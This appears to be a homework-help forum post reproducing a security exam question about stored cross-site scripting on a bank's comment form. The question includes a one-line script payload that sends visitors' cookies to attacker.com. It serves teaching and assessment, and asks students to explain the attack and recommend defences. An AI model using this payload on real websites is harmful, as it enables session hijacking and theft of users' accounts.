Page 1 of 1

b. The website at www.republic.com allows users to submit comments on the republic's bank performance using a form. An a

Posted: Sat May 14, 2022 3:44 pm
by answerhappygod
B The Website At Www Republic Com Allows Users To Submit Comments On The Republic S Bank Performance Using A Form An A 1
B The Website At Www Republic Com Allows Users To Submit Comments On The Republic S Bank Performance Using A Form An A 1 (36.11 KiB) Viewed 96 times
b. The website at www.republic.com allows users to submit comments on the republic's bank performance using a form. An attacker, who controls the webserver at http://attacker.com, enters the comment below. Republic website does NOT sanitize the comment. <script>document.location="http://attacker.com/copyfiles.php?cookie=" + document.cookie;"</script> <b> I really love republic bank! </b> This attack involves a cookie. Whose cookie is it? What is happening to the cookie? Why is this disturbing? [5 marks) c. Describe three actions you would recommend to Republic Bank for securing its web server and Web applications? [6 marks]